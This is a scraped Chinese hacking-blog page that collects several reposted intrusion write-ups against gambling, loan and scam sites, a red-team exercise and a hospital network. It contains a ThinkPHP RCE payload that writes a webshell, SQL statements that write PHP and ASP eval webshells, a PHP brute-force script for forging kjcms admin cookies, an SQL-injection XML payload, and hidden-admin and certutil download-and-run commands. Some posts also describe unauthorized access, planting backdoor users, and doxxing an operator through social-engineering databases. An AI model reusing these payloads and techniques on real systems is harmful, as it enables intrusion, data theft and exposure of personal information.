Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86398605

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

前言

在一个风和日丽的下午,我们正在Blank的带领下,兴致勃勃地讨论着,女人。

图片

而float先生发现了一个访问了他博客的奇怪IP。

图片

哎,根本不把什么网络安全法放在眼里,直接就开打。

Game Start

浏览器访问会直接跳登陆界面。

图片

信息收集

路径上敲个X。拿到ThinkPHP和版本号。

图片


图片

同时,float先生nmap扫到801端口,并确定是宝塔建站。不过这里没有进一步研究。

图片

图片

RCE尝试

5.0.21能直接RCE,且payload满天飞。不过依然遇到了一点小坑。

图片


模块名不是通常的index,而且必须存在。根据跳转登录的uri:

/admin/login/index.html

猜测module为admin,果然成功。

图片

disable_functions赫然在列,则rce果然不成功。

图片

种马

好消息是写文件成功了。

图片

访问shell.php,看到phpinfo界面。

图片

反手就写冰蝎马连它。

图片

趁机瞅了瞅,贷款、经理、业务员、bc...好,继续打。

图片

连接数据库

硬编码还真是宇宙难题,数据库密码到手。

图片


第一次遇到MySQL的密码里有@,直接写会破坏连接串。如:

mysql://root:password@127.0.0.1:3306/mysql

password中的@会提前走到ip:端口的判断。需要把它编码为%40

图片

管理员登录

翻web目录和代码实在没有进展了,尝试登录一下系统。

数据库里有账号口令,当然口令是加盐的哈希。

图片

图片

谁家好人头铁非要暴密码出来,直接patch下login代码,不查表就完事了。

登录系统。

图片

这业务看着真高级,看不懂一点,留下后门用户以防不测


转自于原文链接: https://mp.weixin.qq.com/s/f4nWOGgPXlSA_ChgpBj7Zw

HireHackking

因为这个站是几个月前日的了,所以图片可能不全,也没办法再补图。

写这篇文章的时候,隔壁情侣正在鼓掌,声音贼响,导致我写的东西可能没有过一遍脑子,写的可能有点混乱。另外值得一提的是,为啥我们做安全的经常隔壁碰到这种人?

已知目标网站

c5x5u2i1vea13147.jpg

之前客户有给过这种网站,所以我记忆尤深,针对这种站一般你可以直接放弃正常测试流程了,因为经验告诉我,网站主站功能基本上很少有漏洞的,只能从旁站下手。

Ctrl+u查看一波没发现有什么存在泄漏的js,回过头发现发现网站右上角有个优惠活动大厅

omxsfjpvofc13150.jpg

打开后页面似曾相识

tyv0d4q2w4m13153.jpg

随便点开一个活动,好像可以随便提交文字,没有过滤,我信心满满输入xss,提交,然而两天过去了,并没什么叼用,我当时的心情真是像云像雾又像雨。

zi2j12x4j1513156.jpg

然而我又发现下面有个审核进度查询,打开后会让你输入用户名,既然有输入用户名,那应该就是有带入数据库查询,习惯性加了个’点击查询,10秒过去了,没响应,我懵了,输入正常不存在的账号测试,是会弹出记录的,但是加单引号查询却一点响应都没有。

F12-network抓包,发现是有发送请求的,很明显了,有注入,而且报错是页面是thinkphp,从最下角看版本是3.2.3,这个版本真的是hc的最爱,从色情到贷款平台,再到菠菜都是这个版本的thinkphp。

pnbhamds0iq13158.jpg

先注入一波试试

keft5ssvnj513162.jpg

抓包Sqlmap一波拿到了管理员账号密码,突然我意识到,我没有后台地址,拿到了也没叼用。

Fofa一波得到真实ip,发现999端口存在phpmyadmin服务,6588有一个标题为护卫神丶主机大师的asp站。目录爆破,端口扫描,子域名挖掘,都没有找到后台地址。

kfphc3duppm13165.jpg

Os-shell成功,但是不管我输入什么都没反应。

Sql-shell也一样,仔细观察发现,网站路径是装在护卫神的。

f0blqlfag0q13168.jpg

有可能是护卫神拦截了,当时我还疑惑,这php的站,你用护卫神是什么意思。

等到十分钟后百度了一下hwshostmaster,我才知道我是多么无知,原来护卫神不是光有waf,他还有一个叫主机大师的服务,大概功能与phpstudy相同。

本地安装观察,发现主机大师默认安装后会在999端口启动phpmyadmin,6588端口则启动主机大师默认的管理页面,与我观察的目标ip端口一致。

phzh4bkjs4y13173.jpg

既然目标站有phpmyadmin,那我就可以尝试使用sqlmap枚举一下对方数据库账号与密码hash。

Sqlmap –r sql.txt --string="Surname" --users --password

Sqlmap枚举出来了root与test,root的密码没有破解出来,但是test的密码破解出来为1234。登陆成功。

qy5t550d2u113176.jpg

关于这种情况拿shell,木神的黑白天公众号里有篇文章<phpMyAdmin 渗透利用总结

>已经写的很详细了,木神看到这篇文章麻烦找我结一下广告费。

mysql数据库getshell一般有两种方法,into outfile,导出日志。

根据注入报错页面的文件地址

fxqjdpl20vr13180.jpg

构造语句
select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'
报错#1 - Can't create/write to file应该是没有权限

ecn4phtcxqw13184.jpg

尝试使用日志写入,先开启日志,然后

set global  general_log_file =" D:\\wwwroot\\xxx.com\\web\\a.php"
好像还是不行,我裂开了。

43ihub54ays13188.jpg

突然我想到,既然这个wwwroot目录没有权限,那么护卫神主机大师管理页面是否可以利用一下呢 ,翻了一下本地安装的主机大师文件,可以确认主机大师的管理页面绝对路径是D:\Hws.com\HwsHostMaster\host\web,尝试修改日志

Set global  general_log_file =" D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp"
成功。

jg12riu2cfb13192.jpg

然后执行
select “<%eval request("chopper")%>”

访问http://xxx.xxx.xxx.xxx:6588/1.asp报错404,这个问题难了我好久,后来我才发现,需要把日志文件换成其他的,当前日志文件才可以访问。Cknife连接成功

qtrcvufozre13196.jpg

Whoami发现是system权限,那么剩下的就简单了,为了防止护卫神查杀,生成了个msf免杀马,通过certutil下载,然后执行,msf上线,然后迁移进程,load mimikatz,一套下来拿到了远程账号密码,脱裤打包源码,提交给客户,完事。

总结:1.主站无任何漏洞,对旁站下手,这里从优惠活动资助大厅,发现有注册页面,可尝试嵌套在线xss脚本获取管理员cookie信息,但并没有获取到 cookie2.在审核进度查询出,输入真实存在的用户名加单引号,发现页面没有相应,F12发现,有页面报错,是thinkphp,版本为3.2.33.通过sqlmap进行注入,获取到用的hash值,这里获取到root和test的hash值,能解密出test的hash值。Sqlmap –r sql.txt --string="Surname" --users --password4.通过fofa查询目标网站对应的IP的其他端口,发现存在999和6588端口,其中999位phpmyadmin端口,6588位护卫神管理界面。5.通过test进入phpmyadmin后台,又根据注入报错显示的网站物理路径,这里可以通过into out导入方法写入webshell6.首先写入到web目录下,显示没有权限select 1 into outfile 'D:/wwwroot/xxx.com/web/1.txt'7.开启log日志,发现还是失败set global  general_log_file =" D:\\wwwroot\\xxx.com\\web\\a.php"8.既然wwwroot目录没有权限,那么护卫神主机大师管理页面是否可以利用一下呢 ,翻了一下本地安装的主机大师文件,可以确认主机大师的管理页面绝对路径是D:\Hws.com\HwsHostMaster\host\web,尝试修改日志Set global  general_log_file =" D:\\Hws.com\\HwsHostMaster\\host\\web\\1.asp"9.然后执行select “<%eval request("chopper")%>”10.通过knife成功连接


转自原文连接: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247486068&idx=2&sn=4e32251aaf8c25efee653b3314a05a29&chksm=cfa6ae67f8d127715b23c7b8403a08ccfac2e1bff2ac68030401d54698bcb10cd637a55f7d15&scene=178&cur_album_id=1553386251775492098#rd
HireHackking

逛QQ空间刷到了

图片

于是有了下文。打开站点,很贴心,前台后台都可以进。

图片

图片

下面说漏洞点

  1. sql注入,有一套程序基于某个模板二开,正好我手里有这套模板且审计过。所以轻松拿下。

    图片

    无任何过滤,直接注即可。

    图片

  2. 任意文件上传

    这个我怀疑是开发自己留的后门。

    图片

    看得懂的人一眼就看出来了。直接本地新建表单提交即可。

    但是目标站有个问题,上传不回显路径,应该是注释了echo。本地搭建测试,

    图片

    上传文件名修改为这个格式。

    思路:本地复现upload,然后和远程同时提交,同一个时间点,返回的文件名应该是一样的。

    测试:图片

    复现成功。

    图片

点到为止。

另求教各位精通php审计的大佬

图片

这段代码可否有利用点。

图片

尝试各种截断始终无法执行php代码。

  转载于原文链接: https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ  
HireHackking

0x00 前言

打开链接,发现是一个luo聊的app下载,夜神+burp抓包
图片获取到网址,通过js的文件特征去github查找源码文件图片根据代码发现他是一个kjcms,然后去官网下载源码来进行审计

0x01  sql注入

在cls_weixin::on_exe方法中,有许多执行sql语句的点图片这里注入需要满足$arr_msg[‘FromUserName’]可控,发现$arr_msg变量调用了当前类的get_msg()方法,跟进这个方法:static function get_msg() {    $arr_return = array();    $cont = file_get_contents("php://input");    //$cont = file_get_contents(KJ_DIR_ROOT . "/test.txt");    if(empty($cont)) return $arr_return;    $request = simplexml_load_string($cont , 'SimpleXmlElement' , LIBXML_NOCDATA);    $arr_return = fun_format::toarray($request);    return $arr_return;}发现$cont是通过post数据流获取的,传入的xml,继续跟进fun_format::toarraystatic function toarray($cont) {    if(gettype($cont) == "string") $cont = json_decode($cont);    $arr = (array)$cont;    foreach($arr as $item=>$key) {        if(gettype($key) == 'object' ) {            $key = self::toarray($key);        } else if(gettype($key) == 'array'){            $key = self::objtoarray($key);        }        $arr[$item] = $key;    }    return $arr;}这里不太重要,只是把xml的值转化为数组,所以在on_exe方法中的$arr_msg数组是可控的,即可以产生sql注入,经过本地测试发现,在on_exe方法中的数据查询很多都不存在表,这里发现一个点:图片跟进tab_weixin_message::get_one方法,参数$key是我们可控的,参数$site_id无关紧要图片全局查找cls_weixin::on_exe,在根目录weixin.php调用了这个方法<?phpinclude("inc.php");if(isset($_GET["echostr"])) {    echo $_GET["echostr"];exit;}cls_weixin::on_exe();现在就只需要构造payload了,这里要进入到执行tab_weixin_message::get_one方法,需要进过:
issert($arr_msg['ToUserName'])->issert($arr_msg['FromUserName'])->$arr_msg['MsgType'] == 'event'->$arr_msg['Event']) == 'click'
图片
这个点只能时间盲注,在我本地测试的时候可以通过updatexml(1,if(({}),0x7c,1),1)的方法来实现时间盲注变成布尔注入,目标环境问题无法实现,我就写了个脚本去跑账号密码。图片发现自己傻逼了,在目录文件中会生成数据库报错的文件,路径为:/data/error/db_query/2020_09_16.txt(年份_月份_日.txt)图片知道表结构和字段,直接去目标站注入,拿到后台密码hash,发现解密不了,看了下代码,有盐,是通过md5(pass+盐)进行加密的,这里盐也是在密码表中可以看到的,发现也解密不了。

0x02  伪造cookie

在登录处,发现cookie中的kj_s_id和kj_login_time是用来登录的,感觉可以伪造,这里我跟进下代码,看下kj_s_id是怎么生成的,验证登录处代码:
function act_login_verify() {        $arr_return = $this->on_login_verify();        return fun_format::json($arr_return);    }跟进on_login_verify方法function on_login_verify() {    $arr_return = array("code" => 0 , "id"=>0 , "msg" => cls_language::get("login_ok"));    $arr_fields = array(        "user_name" => fun_get::post("uname"),        "user_pwd"   => fun_get::post("pwd"),        "verifycode" => fun_get::get("verifycode"),        "autologin" => fun_get::get("autologin")    );    if(!fun_is::pwd($arr_fields["user_pwd"])) {        $arr_return["code"] = 7;        $arr_return["msg"]  =  fun_get::rule_pwd("tips");        return $arr_return;    }    $arr = cls_obj::get("cls_user")->on_login($arr_fields);    if( $arr["code"] != 0 ) {        $arr_return = $arr;        return $arr_return;    }    return $arr_return;}$arr_fields数组中获取登录的账号密码,继续跟进on_login方法图片$str_id是通过fun_get::safecode方法来的,现在只需要$perms[‘sid’]是怎么来的,跟进查看,并没发现到什么,这里,我直接打印出self::$perms[‘sid’]的值,发现是ip+时间戳+随机数的形式
echo self::$perms['sid'];exit;
图片发现这里数据存放在数据库的kj_sys_session表中的session_id字段,而session_user_id表示是否登录在,1表示登录在,0表示退出了登录。图片我们有注入点,这个session_id我们可以通过注入来获取到的,现在跟进fun_get::safecode方法,看cookie中的kj_s_id是怎么加密的图片跟进$str_key变量,看他是从哪里来的,跟进cls_config::MD5_KEY,发现他来自data\config\cfg.env.online.php中的MD5_KEY常量。而这个常量是安装的时候随意random的五位数图片最后获取的$str_return是由3部分组成$str_left,base64($msg_val),$str_right,所以这个$str_key变量需要我们继续爆破,并且知道fun_get::safecode方法的$msg_val参数是ip+时间戳+随机数的形式,下面就进行漏洞复现。

0x03 漏洞复现

首先抓取目标站后台登录时的cookie,如:NgMTE5LjYyLjEyNC4yMTE1OTgzNTI1NDM4NzUYTBjZmVkN2ZmMzY2OTYzYg,假设我的ip地址为104.192.225.86,通过base64为MTAzLjE5Mi4yMjUuODY=,去掉=。本地经过测试发现ip+时间戳+随机数通过base64编码后为36位,所以上面的加密密文就为:
Ng
MTE5LjYyLjEyNC4yMTE1OTgzNTI1NDM4NzUY
TBjZmVkN2ZmMzY2OTYzYg
我们通过注入获取$msg_val参数和登录状态<?xml version="1.0"?><note>    <ToUserName>cccc</ToUserName>    <FromUserName>1</FromUserName>    <MsgType>event</MsgType>    <Event>click</Event>    <EventKey>1' and updatexml(1,concat(0x7e,(select concat(session_id,0x7e,session_user_id) from `kj_sys_session` order by session_user_id desc limit 0,1),0x7e),1)#</EventKey></note>图片成功读取到了,这里就需要爆破MD5_KEY,他是五位数的,用他的代码修了下php的爆破脚本<?phpfunction safecode($msg_val,$msg_type="encode",$str_key_val = '36118'){ // 192.168.50.1351600069125552        $str_key       = $str_key_val;        $str_en_key    = base64_encode($str_key);        $str_md5_key   = md5($str_key);        $str_md5_key_1 = substr($str_md5_key , 0 , 1);        $str_md5_key_2 = substr($str_md5_key , -1 , 1);        $lng_key_1     = ord($str_md5_key_1);        $lng_key_2     = ord($str_md5_key_2);        $lng_x_key1    = substr($lng_key_1,-1,1);        if($lng_key_1 > 9) {            $lng_x_key2 = intval(substr($lng_key_1 , -2 , 1)) + $lng_x_key1;        }else{            $lng_x_key2 = $lng_x_key1 * 2;        }        $str_left      = base64_encode(substr($str_md5_key , $lng_x_key1 , $lng_x_key2));        $lng_2_key1    = substr($lng_key_2 , -1 , 1);        if($lng_2_key1 > 9){            $lng_2_key2 = intval(substr($lng_key_2 , -2 , 1)) + $lng_2_key1;        }else{            $lng_2_key2 = $lng_2_key1 * 2;        }        $str_right = base64_encode(substr($str_md5_key , -$lng_2_key2));        if($msg_type == "encode"){            $str_en_id   = base64_encode($msg_val);            $str_en_code = $str_left . $str_en_id . $str_right;            $str_return  = str_replace("=" , "" , $str_en_code);        }else{            $str_left    = str_replace("=" , "" , $str_left);            $str_right   = str_replace("=" , "" , $str_right);            $str_llen    = strlen($str_left);            $str_rlen    = strlen($str_right);            $str_len     = strlen($msg_val);            if($str_len < ($str_llen + $str_rlen)){                $str_return = "";            }else{                $str_return = base64_decode(substr($msg_val , $str_llen , -$str_rlen));            }        }        return $str_return;    }

function getNumber($start=1,$end=99999){    for ($i=$start; $i <= $end; $i++) {         $arr[] = substr(str_repeat("0",6).$i,-5,5);    }    return $arr;}
$numbers= getNumber(1,99999);foreach ($numbers as $val){    $keyss = safecode('105.112.215.421600227695831','encode',$val)."<br />";    echo $keyss.':'.strval($val)."<br />";    if ($keyss == 'NgMTAzLjE5Mi4yMjUuNDIxNjAwMjI3Njk1ODMxYTBjZmVkN2ZmMzY2OTYzYg'){        echo $val;        exit;    }}成功获取到了MD5_KEY,然后我们在通过这个脚本利用这个MD5_KEY来生成kj_s_id图片最后就可以伪造cookie登录后台了图片图片

0x04  重装漏洞getshell

本来以为后台可以直接修改文件上传的后缀,发现事情并没有那么简单图片发现还是限制了php无法上传,跟进这部分代码看了下,lib\tab\tab.other.attatch.php图片这里会先获取上传文件的后缀,来判断后缀是否存在$arr_no_allow_ext数组中,所以会先判断数组里面的上传类型,在判断允许上传的类型。这里只有针对windows可以getshell了,我们将上传类型修改成php(空格),由于windows特性,会把空格去掉。图片然而我们的目标是linux,这种方式不行了,再回来看看代码后台是否有getshell的点,除了在重新安装的点就没发现可以shell的点了(自己太菜了,找到不影响正常功能shell的点)。在文件app\model\install\mod.index.php中的on_config方法:图片mysql的账号密码是通过file_put_contents函数写入到配置文件\data\config\cfg.env.online.php,并没有通过这个cms的过滤函数fun_get::get/post方法,这个方法过滤如下:static function filter_base($str_x , $is_reback=false) {    $search = array("&amp;","&","/amp;/amp;/amp;",'"',"'","<",">",chr(13).chr(10));    $replace = array("/amp;/amp;/amp;","&amp;","&amp;","&quot;","&#039;","&lt;","&gt;",chr(13));    if($is_reback) {        $str_x = str_replace($replace , $search , $str_x);        $str_x = str_replace('\\\'',"'",$str_x);//替换经过mysql转义的格式        $str_x = str_replace('\\"','"',$str_x);    }else{        $str_x = str_replace($search , $replace , $str_x);    }    return $str_x;}全局查了下,$is_reback参数都是为默认的false,为true的话,这个过滤就没啥影响了。现在重装漏洞的点可以实现了,需要一处任意文件删除来将\data\install.inc锁文件进行删除就可以重新安装了。在后台系统日志处,有一次日志文件删除的点,这个点不用看代码都知道可以删除,因为在fun_get::get/post方法中并没有过滤/``.图片删除了install.inc锁文件就可以进行重新安装了。在数据库名填上我们的任意php代码,就可以shell了。图片重装漏洞虽然可以拿下shell但是不推荐使用重装漏洞会影响正常网站的数据


转自于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486466&idx=1&sn=121b62ef2740e8474119c3914d363e4c&chksm=ce67a69bf9102f8deac87602cbb4504f9a59336fb0113f728164c65048d0962f92dd2dd66113&scene=21#wechat_redirect
HireHackking
在鹰图中找TSRC资产准备挖腾讯SRC时候看到此站点域名:qq.com.xxxx.top,标题为登录图片第一感觉不是正经站应该是钓鱼站whois查询到的图片webpack打包的图片这种站点基本都会有一些测试账号,试了试18888888888密码123456图片看到这个基本确定这就是个做任务赚佣金的那种,主打的就是一个骗钱图片图片图片F12翻找请求和js找到,加载的资源文件报错, 用的thinkphp但是没洞,真是IP也有了找到后台伪装的挺好的叫xxx打卡系统  图片通过fofa查ip找到其他资产,ip访问发下是一个企业建站模版页面,ip后面加个admin跳到企业建站后台实话这个真烂图片在ip后面家入/x又是thinkphp5.0.5的笑死,验证存在rce那个做任务赚佣金的站点还没有好好测简单收集信息,找到旁站进去了基本上数据库配置都在data 或者config图片图片md5解密管理员密码,进后台看看其他信息不怎么关注,主要找站点管理员

图片

图片

1.敏感手机号通过推荐人号很频繁就是一个手机号,139xxxx2.管理员登录日志分析:可疑ip定位在四川3.通过手机号查到微信,和支付宝查到这个人4.通过社工库查到此人QQ,微博以及本人照片

图片

图片

图片

图片

图片



转载于原文链接: https://mp.weixin.qq.com/s/9M0HEP1x-5Xt1JQeyVDrGA
HireHackking

0x00前言

本来开学正忙于实现电竞梦(联盟高校联赛),某一天下午突然有位师傅联系我说可以免面试进组打省护红队,这么好的实战机会怎么能错过呢~(好好玩游戏,不要学我^^)

0x01 一个出局的企业单位内网之旅

打点一

故事的开始是某佬丢了一个系统nday shell给我

image.png

ipconfig发现有10段内网,这种网段内网一般都很大

image.png

但是这种nday已经被别人扫烂了 目录全是马

image.png

发现不对劲,这是什么?! 哪位不知名黑客昨天传的fscan

image.png

但是目标单位还没出局 先打再说
准备cs上线 但是发现不出网

image.png

先在哥斯拉传fcsan命令执行扫了一下b段

(应该先noping稍微扫一下c段再拿一台机器留后路在搞,这次做的有问题,不然流量检测设备检测到了,然后关站就直接寄了)
一堆弱口令redis

image.png

Neo-reGeorg使用

使用Neo-reGeorg正向隧道工具把流量代理出来:

Neo-reGeorg是常见的http正向隧道工具,是reGeorg的升级版,增加了内容加密、请求头定制、响应码定制等等一些特性

python3 neoreg.py generate -k xxx --file 404.html --httpcode 404

生成一个webshell密码为xxx

比较有意思的是,工具新增的404模版功能,实战copy目标站点的404html,给到工具之后生成的webshell直接访问是404,对文件隐藏有很好的帮助

图片.png

上传至目标站点

图片.png
python3 neoreg.py -k xxx -u http://xxxxx.com/404.php -p 端口

图片.png
本地Proxifier配置代理:SOCKS5://127.0.0.1:1081

图片.png
刚访问了一个web站点看看通不通 加载了一个title
都准备开始截图写报告了
结果又不动了 我以为是代理的问题

image.png

结果发现目标站关了。。。。
(感觉应该是昨天穿fscan的师傅打完内网交报告了然后企业直接关站了)
陷入困境 看着这么多的弱口令却触摸不到 太可惜了

打点二

去找该企业子域和其他资产再找突破口
找到了一个边缘资产的登录框
注册功能接口被换成了弹窗
图片.png
试了着跑了一下注册功能字典 无果
发现他们登录的url是sys_login.aspx
我们构造一个sys_register sys_reg sys_zc.aspx去试试
果不其然 可是。。。

图片.png
但是这次翻F12看js文件就不一样了

图片.png
构造请求成功注册了一个账号 并且发现了一个敏感参数

图片.png
role修改为1 成功注册一个管理员账户

.net的站管理员权限后台很容易找了个上传点配合图片免杀马就shell了

image.png

在爆破接口的时候,可以通过看目标站点的接口命名规则灵活变化精准爆破,注册用户在请求包或者返回包中可以多注意role,Permissions,power这种敏感的参数。

哥斯拉连接 发现这台机器居然是出网的!

image.png

内网一

上传我的免杀马子 用哥斯拉的提权插件美美system上线~
image.png

用frp内网穿透

image.png

美滋滋登弱口令截图写报告时,发现这台机器是10.8.xxxx 上台机器是10.9.xxxx 两个网段不通 做了隔离

这个时候我们的主要目标就是寻找双网卡主机

那就先上这台机器用fscan扫下吧

3389添加用户小技巧

因为是该机器是server2016 mimikatz抓不到明文密码,就只能添加用户 3389登录了

net user test 123456 /add  
#添加用户名为test密码为123456的用户
net localgroup administrators test /add #把test用户提升至管理组

这里有三个小技巧

  1. net不能用时 可以用net1代替效果一样
  2. /add也可以用/ad代替 执行效果一样
  3. 使用$添加隐藏用户:net user test$ 123456 /add

image.png

image.png

传fscan扫了一下 发现这个网段机器偏少 弱口令也没几个
现在的目标是找到双网卡主机!然后进入一堆弱口令的网段里,写报告写死我

先登了这个网段扫到的弱口令机器,发现都是设备

图片.png
只能继续找其他突破口了
在这台机器翻了一波 发现了一个显眼的sa.txt文件

image.png

果不其然,里面放了一些密码,fscan再密码喷洒一波

拿下双网卡主机

弱口令ssh ifconfig 芜湖~ 双网卡主机

image.png

frp多层网络代理

用frp搭个多层网络代理隧道
大概就是这样
hacker>vps(服务器端)>第一台内网机(客户端)(服务端)>双网卡内网机(客户端)

image.png

image.png
然后再用proxifier搭个代理链

image.png
我们就可以通10.9网段了,美滋滋的写报告的时候 被通知对方出局了~

image.png
把手里的报告交了,因为慢了昨天传fscan的师傅一步,所以也没得多少分。

0x02 某某医院的内网之旅

打点三

打点很简单 某某医院的小程序 点点点点

image.png

在burp插件里找到了惊喜

image.png

shiro反序列化 工具梭哈

hw面试常问的shiro反序列化的原理:

序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞

通俗的讲就是有了key就能构造恶意的payload服务器接受后会进行反序列化,从而达到了远程命令执行的效果。
image.png

又是一个内网~

100w加公民信息泄漏

在这台主机上找到了这种表格好几个

图片.png

image.png

加起来100w余公民的医疗数据身份证等敏感信息~

这台机器是2008 用mimikatz读密码 3389登录

image.png

内网二

frp穿透进入内网 然后就是翻垃圾桶 翻数据库收集密码~

收集密码的几种思路(尤其是个人使用的电脑,密码超多)
1.各种浏览器保存的密码,可以使用BrowserGhost.exe等工具
2.如果主机有navicat的话可以读取密码
3.翻回收站,桌面中的txt文档,还有一些配置文件。
image.png

后面就是fscan+超级弱口令密码碰洒 就完了
不得不说看着密码碰洒是真滴爽啊^^

image.png
因为fscan默认是不支持扫rdp弱口令的

一般是用fscan扫开放3389的机器,然后导出到超级弱口令等软件进行爆破,但是这样会由于fscan扫描不全漏掉一些机器,笔者建议最好上传nmap编译版或者一些专业扫描工具去探测。
最后也是拿下几十台主机权限,内网沦陷~(可惜没有双网卡)

image.png

内网渗透没有域的话,个人觉得就是慢慢磨,收集密码喷洒,再收集再喷 横向(免杀也很重要)~

0x03文末

感谢各位师傅们能看到这里,第一次正式作为红队打攻防演练,有某佬的带领下还是打的比较轻松的,也是拿到了优秀攻击队伍

 

转自于原文链接:https://forum.butian.net/share/2528

HireHackking

一、 起因

近年来国内发生各种非法菠菜赌博案例非常之多,本次我就来讲解一下我是如何渗透下一个非法菠菜的网站的。本次渗透纯粹是运气+站长疏忽,可谓是千年堤坝毁于蚂巢之说。为了保证读者的理解,特采用入侵者的身份来纪实!

二、踩点及收集信息

打开目标站,发现是一个菠菜网站,然后开始收集信息了

图片

域名的whois信息查询得知域名来自西部数码

图片

这里我使用站长之家的ping工具是为了看有没有使用CDN及查询服务器机房位置。从whois结果得知使用的是dnspod的dns,但是有过经历的都是知道,一般的大型的IDC厂商,都是有自己的dns,代理才会使用dnspod 很明显,这个域名在代理上注册的,本来准备社工域名,但是没什么意义,别人解析回来了还是一样的使用,之前F4ther写过一篇文章是说做了个蜜罐钓鱼劫持了安全脉搏。但是太麻烦,还是直接略过,直接渗透吧。

图片

我看到URL后面是Home/Change/AlipayInfo/alipay/微信.html,我第一预感就是使用ThinkPHP框架来写的程序。

图片

为了验证我的猜想,我特地随便输入地址看他报错,一般的ThinkPHP报错都会显示出版本+物理路,其结果,有图上踩点可以得到以下信息

1. 此站使用的是ThinkPHP3.2.2的框架。

2. 物理路劲C:\WWW\pcdd\pc

3. 此网站没有使用CDN

4. 此网站服务器在境外(加拿大)。

5. 此网站必有漏洞。

图片


三、 开始战斗

随便找了一处直接sqlmap测试,结果如下图,有防护,直接被墙,导致无法继续,连接一个VPN

图片

再看看,不行想办法过防护,直接访问ping出的IP 47.xx.xx.xx,发现phpstudy的探针一枚

图片

在phpstudy默认的数据库密码都是root于是,我们开始尝试弱口令

图片

发现他是个弱口令。于是在访问一下47.xx.xx.xx/phpmyadmin。很不幸,又被墙,说明这防火墙有点狗,换个节点,直接登录。

图片

后来直接用sql语句导出一句话木马,登录进去之后直接点SQL,然后执行语句

select '<?php @eval($_POST[1])?>' into outfile 'C:\/WWW\/pcdd\/pc\/log1.php';

这里使用双斜杠且一个斜杠是反的的目的是怕他直接解析不出斜杠,然后因为执行sql语句又被墙一次。

之后我直接上菜刀,换个节点 因为执行了SQL语句,肯定被墙,所以直接换节点。

图片

切记,这时候你在shell里面翻目录是要被墙的100个节点也不够你翻的,直接执行语句提权,然后连服务器,这里站长修复漏洞了,木马自然不复存在,无法复现,不过站长没有删除我的账号。

图片

发现他是使用阿里云的rds数据库,密码也是挺复杂的。

四、总结

1.他网站采用云数据库站库分离,首先第一比较安全,第二数据处理比较好,但是因为疏忽了本地环境的数据库的弱口令,导致被入侵。2.细节真的很重要比如信息收集,很多人在目标站盯了很久,一点收获都没有,这时候不妨好好地去看一下它的窗户,后门。本文就是直接访问IP发现了环境配置和探针。才能够如此顺利进来。3.基础很重要,比如你不知道phpstudy环境的默认密码和默认地址呢,如果phpstudy的默认密码是其他的呢?不清楚phpstudy环境的根本不了解默认的权限是system4.做事要慎独,一定要把工作量最小化,比如在执行sql语句导出一句话木马的时候很有可能phpmyadmin解析成C:WWW之类的,所以双斜杠反斜杠最好每次测试的时候都带上,反正也没什么影响。比如你要去翻目录肯定要被墙,起码要浪费一分钟去换节点,做过众测的朋友都知道众测里都是争分夺秒的。所以本次案例因为防火墙的原因我直接提权。5.在自己建站的时候一定不要懒惰,要把所有权限做的完美,把被入侵的风险降低到最小。

转载于原文链接: https://mp.weixin.qq.com/s/3y894HT1uBBGdifbIToQZQ




HireHackking

 前言

    喜欢看电影但又喜欢白嫖,所以经常在一些影视站点观看,偶尔会弹出一些色懒广告,最近公众号也没怎么更新就顺手找到一个色懒约P的广告试试由于尺度比较大打码比较严重

简单总结

  1. 色懒视频---引用外部x站的播放源
      图片       2.选X----后台都是城市和百度的照片乱七八糟的介绍,假的       3.预约---菠菜游戏,通过诱导方式引导下注     图片看到这是不是心动了,在放一张后台的数据图片

实战经过

    通过域名查ip找到找了后台,xx娱乐,扶墙找了一波源码,找到了类似源码以及搭建教程泄露了站点的ip一般的站点演示都附带了演示账号密码后台以及各种指纹特征
图片    通过演示站点的指纹和默认账号密码找到一批同类型的站点,基本都是通过色懒视频约p噱头引导玩菠菜图片    后台开奖预设,都是骗局,希望看到这里可以分享此篇文章给你的色懒朋友
图片    前期是通过找源码找演示站找指纹的方式搞进去的,还有一些站点,就是正常的渗透方式
    首先注册账号
    看到提示用户名可以自定义直接顺带上xss代码,比较鸡肋,后台很难触发图片     后台用户展示是这样,管理点击用户详细信息才会触发图片图片        还有就是基本上都是养鱼式引导,小额提现,大额各种阻挠图片    最后统计3k多人小台    找到管理员大概位置

图片



转载于原文链接: https://mp.weixin.qq.com/s/IIyt-m1ul0UPXvocmwCfag
HireHackking

最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。

图片

为thinkphp5.0.5随用RCE进行打入,成功写入webshell。

s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))
查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数,且com和dl加载都不能用无法执行相应的系统命令如下所示:
图片
assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open
//php如上系统命令都已禁用
但有文件的读写权限没有禁用assert(),file_put_contents()等函数,查看后发现为windows系统如下所示:

图片

由于php执行系统命令的函数都被禁用了,从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波,发现其管理员cookie固定且可以伪造如下所示看着像后门:
图片

故可后台登录绕过,管理员cookie固定,添加cookie字段即可登录绕过。浏览器f12,在cookie中添加上述键值访问index,即可成功后台登录如下所示好多钱(被骗的人好多):
图片
前台询问客服了解到转账账户(该杀猪盘运作方式是用户将钱打入客服提供的账号后,用户再在自己的账号冲入相应数值的资金至后台审核,审核后即可使用该数值的钱进行货币的涨跌投资买卖交易),留作证据上交:
图片

